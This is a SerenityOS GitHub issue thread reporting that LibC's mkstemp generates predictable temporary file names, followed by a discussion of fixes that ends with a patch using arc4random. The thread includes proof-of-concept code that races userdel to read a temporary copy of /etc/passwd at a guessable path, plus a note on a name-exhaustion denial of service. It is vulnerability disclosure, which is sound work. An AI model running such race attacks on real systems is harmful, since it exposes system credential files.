### ISSUE TITLE
LibC: mkstemp temporary file names are deterministic

### ISSUE THREAD

**Issue by bcoles** [SerenityOS/serenity#4089]
`mkstemp` temporary file names are deterministic. The first `template` generated for a temporary filename is `dxmoid`.

Related: #654

The path is predictable for every process for every boot.

![mkstemp](https://user-images.githubusercontent.com/434827/99160377-efd17480-273a-11eb-8a23-50263996adbe.png)

Also, `mkstemp` is failing to use the full `template` (default 6 characters). (Patched in #4090. The first `template` generated for a temporary filename is now `087ttl`.)

```
/*
 * Copyright (c) 2020, the SerenityOS developers.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this
 *    list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice,
 *    this list of conditions and the following disclaimer in the documentation
 *    and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef BUFSIZ
#    define BUFSIZ 4096
#endif

int main()
{
    char result[BUFSIZ];
    for (long i = 0; i < 10; i++) {
        char path[] = "/tmp/asdf.XXXXXX";
        char fd_path[BUFSIZ];
        auto fd = mkstemp(path);
        if (fd == -1) {
            perror("mkstemp");
            break;
        }
        memset(fd_path, 0, sizeof(fd_path));
        sprintf(fd_path, "/proc/self/fd/%d", fd);
        memset(result, 0, sizeof(result));
        readlink(fd_path, result, sizeof(result)-1);
        printf("%s\n", result);
        close(fd);
        unlink(path);
    }

    return 0;
}
```

---

PoC attack against `userdel` :

![mkstemp](https://user-images.githubusercontent.com/434827/99159556-6c5f5580-2731-11eb-84b9-3af37fadf39d.png)

Introducing a time delay to win the race more easily:

```diff
diff --git a/Userland/userdel.cpp b/Userland/userdel.cpp
index e310fc14a..a3c456c01 100644
--- a/Userland/userdel.cpp
+++ b/Userland/userdel.cpp
@@ -108,6 +108,8 @@ int main(int argc, char** argv)
         rc = 1;
     }
 
+    sleep(5);
+
     if (rc) {
         if (unlink(temp_filename) < 0) {
             perror("unlink");
```

Stealing `/etc/passwd` :

```cpp
/*
 * Copyright (c) 2020, the SerenityOS developers.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this
 *    list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice,
 *    this list of conditions and the following disclaimer in the documentation
 *    and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef BUFSIZ
#    define BUFSIZ 4096
#endif

int main()
{
    FILE* fp = nullptr;
    const char* path = "/etc/passwd.dxmoid";

    while (true) {
        fp = fopen(path, "r");

        if (!fp)
            continue;

        printf("FILE: %s\n", path);
        for (int line = 0; line < 10; ++line) {
            char buffer[BUFSIZ];
            auto* str = fgets(buffer, sizeof(buffer), fp);
            if (!str)
                break;
            fputs(str, stdout);
        }

        fclose(fp);
        break;
    }

    return 0;
}
```

**Comment by alimpfard** [comment]
The users of `mkstemp()` (and `rand()` in general) are expected to call `srand(...)` first; I'd call this a very crappy interface, but it's libc :man_shrugging: 

I'm suggesting deprecating `rand()` and whatever uses it (at least in C++ code), and providing something less shit for each, but that's not the most practical idea around...

**Comment by bcoles** [comment]
> 
> 
> The users of `mkstemp()` (and `rand()` in general) are expected to call `srand(...)` first; I'd call this a very crappy interface, but it's libc :man_shrugging:

This is a flaw in SerenityOS LibC, not modern libc.

Programs which call `rand()` / `srand()` are expected to seed; programs which call functions which consume randomness (`mkstemp()`) are not expected to seed.

I understand that SerenityOS LibC is a work in progress; however, I find it hard to believe that requiring seeding `srand()` before calling functions requiring randomness is an intentional long term solution. Hence creating this issue to describe the issue and discuss solutions.

If it is expected that users of some LibC functions should first call `srand()`, this should be displayed prominently in documentation, especially where this differs from modern libc.

If you're referring to libc (not LibC), can you point me to documentation which suggests that callers of `mkstemp()` need to first seed `srand()` ? (Published within the last 20 years preferably.)

Programs which call functions which require randomness, such as `mkstemp()`, should be a closed system which take care of randomness automatically. Placing the burden on the caller is error prone, as demonstrated by `userdel`.

Ideally, SerenityOS LibC should use a random number from the operating system for "secure" "random" number generation.

For example, here's the output of the same program (that does not seed `srand()`) compiled with gcc 10 on Ubuntu 20.04:

```
user@ubuntu:~/Desktop/serenity$ ./a.out 
/tmp/asdf.QFBrM8
/tmp/asdf.VfPH77
/tmp/asdf.d9uQn6
/tmp/asdf.w5oeB8
/tmp/asdf.FqWwU8
/tmp/asdf.kEdE09
/tmp/asdf.oHVGr7
/tmp/asdf.JsQCT6
/tmp/asdf.gz61W6
/tmp/asdf.AH7Da7
user@ubuntu:~/Desktop/serenity$ ./a.out 
/tmp/asdf.cxekDe
/tmp/asdf.moJmob
/tmp/asdf.P9yqEe
/tmp/asdf.3Lj7Oa
/tmp/asdf.Ce4IBd
/tmp/asdf.VIS0tb
/tmp/asdf.1lStkc
/tmp/asdf.NXXIwe
/tmp/asdf.kS1i2b
/tmp/asdf.5yJgVd
user@ubuntu:~/Desktop/serenity$ 
```

> I'm suggesting deprecating `rand()` and whatever uses it (at least in C++ code), and providing something less shit for each, but that's not the most practical idea around...

I'm all for deprecating "insecure" random functions, although overuse of "secure" "random" functions poses a risk of depleting system entropy. I have no idea how likely that is. None the less, I suggest at least raising a warning when insecure functions are used.

Fortunately, we're in a position where we don't have to comply with spec and can choose a more secure implementation if desired.

On the topic of randomness and cryptography, cryptographers generally know what they're talking about. If something is done a specific way there's probably a reason for it. We should follow other implementations, unless the implementation was based solely on backwards compatibility.

**Comment by alimpfard** [comment]
It seems I was very wrong in my assumptions about `mkstemp()`, the one in glibc doesn't care about the random seed, it seems to be using the pid and some bits from the current time.

**Comment by bcoles** [comment]
> 
> 
> It seems I was very wrong in my assumptions about `mkstemp()`, the one in glibc doesn't care about the random seed, it seems to be using the pid and some bits from the current time.

For reference, Haiku had the same issue and solved it in a similar way - by modifying stdlib to seed `rand()` with pid info and a timestamp (once) :

* https://dev.haiku-os.org/ticket/13660
* https://git.haiku-os.org/haiku/commit/?id=22b7e29bc6c817ed513afd7542f77de8396930d1

**Comment by awesomekling** [comment]
I think the appropriate solution here is to use `arc4random()` or better yet, the helpers from `<AK/Random.h>` which use the kernel's random source.

**Comment by bcoles** [comment]
There's also a secondary issue here, in that the `__generate_unique_filename(char* pattern)` function used to generate unique filenames will make only 100 attempts:

https://github.com/SerenityOS/serenity/blob/cef6b7b2e4d334733a9c979fa822ed3e46fed10e/Libraries/LibC/stdlib.cpp#L187-L196

Thus, due to the predictable nature of the generated file names, it is possible for one process to exhaust all 100 possible temporary file names for a specific `pattern`, denying temporary files to every other process which utilizes the same `pattern`.

**Comment by bcoles** [comment]
> 
> 
> I think the appropriate solution here is to use `arc4random()` or better yet, the helpers from `<AK/Random.h>` which use the kernel's random source.

I opted to use `arc4random()` as a simple solution, rather than import Kernel includes into LibC, as it uses the Kernel RNG `getrandom()` syscall under the hood. Patched in #4502.
